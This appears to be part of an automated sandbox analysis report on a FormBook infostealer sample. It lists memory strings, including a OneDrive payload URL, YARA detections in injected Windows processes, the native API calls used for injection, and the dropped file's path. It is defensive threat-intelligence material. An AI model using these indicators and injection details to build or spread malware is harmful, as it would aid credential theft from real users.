          Source: Fdhlajk.exe, 00000010.00000003.400923077.0000000000899000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000008.00000000.468015221.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Fdhlajk.exe, 00000010.00000003.400962283.00000000008A4000.00000004.00000001.sdmpString found in binary or memory: https://pxqklq.sn.files.1drv.com/y4mAqf93vESEsLAwmv3Js3T3TVTVs9n9BMjWgdbjboex1CPBHIn5H8wAnTdclH8voCt
          Source: rundll32.exe, 0000001C.00000002.865949851.0000000005342000.00000004.00000001.sdmpString found in binary or memory: https://www.cdnbest.com/?code=404
          Source: Yara matchFile source: Process Memory Space: Form_TT_EUR57,890.exe PID: 6840, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Fdhlajk.exe PID: 6148, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Fdhlajk.exe PID: 6496, type: MEMORYSTR

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.logagent.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.secinit.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.mshta.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.logagent.exe.10410000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.mshta.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.0.secinit.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.mshta.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.0.secinit.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.secinit.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.mshta.exe.10410000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.logagent.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.logagent.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 29.2.secinit.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.2.secinit.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 26.0.mshta.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 26.0.mshta.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.logagent.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.logagent.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 26.2.mshta.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 26.2.mshta.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 29.0.secinit.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.0.secinit.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 26.0.mshta.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 26.0.mshta.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 29.0.secinit.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.0.secinit.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 29.2.secinit.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.2.secinit.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 26.2.mshta.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 26.2.mshta.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049AB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049AAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049AA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049AA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049AA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030EA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030EA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030EA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030EAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030EB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_104281C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_10428270 NtReadFile,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_104282F0 NtClose,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_104283A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_104281BA NtCreateFile,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_1042826B NtReadFile,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_104282EA NtClose,
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_1042839C NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C9237F
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C92075
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C921F8
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C92627
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497B090
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497841F
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21002
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496F900
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04960D20
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04984120
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A31D55
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04986E30
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499EBB0
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 16_3_02CB237F
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 16_3_02CB2075
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 16_3_02CB21F8
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 16_3_02CB2627
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02CB237F
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02CB2075
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02CB21F8
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02CB2627
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03172B28
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DEBB0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0316DBD2
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03171FF1
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030C6E30
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031722AE
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03172EF7
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AF900
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03172D07
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A0D20
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030C4120
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03171D55
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D2581
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031725DD
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030BD5E0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161002
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B841F
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030BB090
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D20A0
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031720A8
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031728EC
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_10411030
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_1042B889
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_10418C60
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_1042CCAE
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_1042C55C
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_1042BD2F
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_10412D87
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_10412D90
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_10412FB0
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: String function: 02CA0668 appears 40 times
          Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 030AB150 appears 35 times
          Source: Form_TT_EUR57,890.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: Form_TT_EUR57,890.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Fdhlajk.exe.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: Fdhlajk.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
